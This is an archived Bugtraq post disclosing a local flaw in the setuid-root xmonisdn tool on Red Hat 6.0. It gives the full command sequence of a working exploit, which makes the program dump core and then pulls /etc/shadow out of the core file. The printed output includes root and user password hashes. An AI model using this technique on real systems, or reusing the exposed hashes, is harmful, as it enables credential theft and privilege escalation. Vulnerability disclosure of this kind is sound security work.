Hello, While playing with xmonisdn (included in the isdn4k-utils package), I discovered a little bug. I didn't find anything regarding xmonisdn in the Bugtraq archives, so here's a quick post. I'm wondering if other xmonisdn users can reproduce this exploit. (Tested on my workstation, which is running Red Hat Linux 6.0) [syntonix@damien bin]# pwd; ls -al xmonisdn /usr/bin -rwsr-xr-x 1 root root 13528 Mar 4 1998 xmonisdn [syntonix@damien bin]# xmonisdn -file /etc/shadow Warning: Cannot convert string "netactive" to type Pixmap Warning: Cannot convert string "netactiveout" to type Pixmap Warning: Cannot convert string "netwaiting" to type Pixmap Warning: Cannot convert string "netinactive" to type Pixmap Warning: Cannot convert string "netstart" to type Pixmap Warning: Cannot convert string "netstop" to type Pixmap [1]+ Stopped xmonisdn -file /etc/shadow [syntonix@damien bin]# bg [1]+ xmonisdn -file /etc/shadow & [syntonix@damien bin]# killall -8 xmonisdn [1]+ Floating point exception(core dumped) xmonisdn -file /etc/shadow [syntonix@damien bin]# strings core|less <snip> /lib/ld-linux.so.2 root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500 bin:*:10878:0:99999:7::: daemon:*:10878:0:99999:7::: adm:*:10878:0:99999:7::: lp:*:10878:0:99999:7::: sync:*:10878:0:99999:7::: shutdown:*:10878:0:99999:7::: halt:*:10878:0:99999:7::: mail:*:10878:0:99999:7::: news:*:10878:0:99999:7::: uucp:*:10878:0:99999:7::: operator:*:10878:0:99999:7::: games:*:10878:0:99999:7::: gopher:*:10878:0:99999:7::: ftp:*:10878:0:99999:7::: nobody:*:10878:0:99999:7::: xfs:!!:10878:0:99999:7::: ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492 syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484 <snip> -- Ron van Daal | Syntonic Internet | tel. +31(0)46-4230738 ronvdaalat_private | www.syntonic.net | fax. +31(0)46-4230739
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:07:56 PDT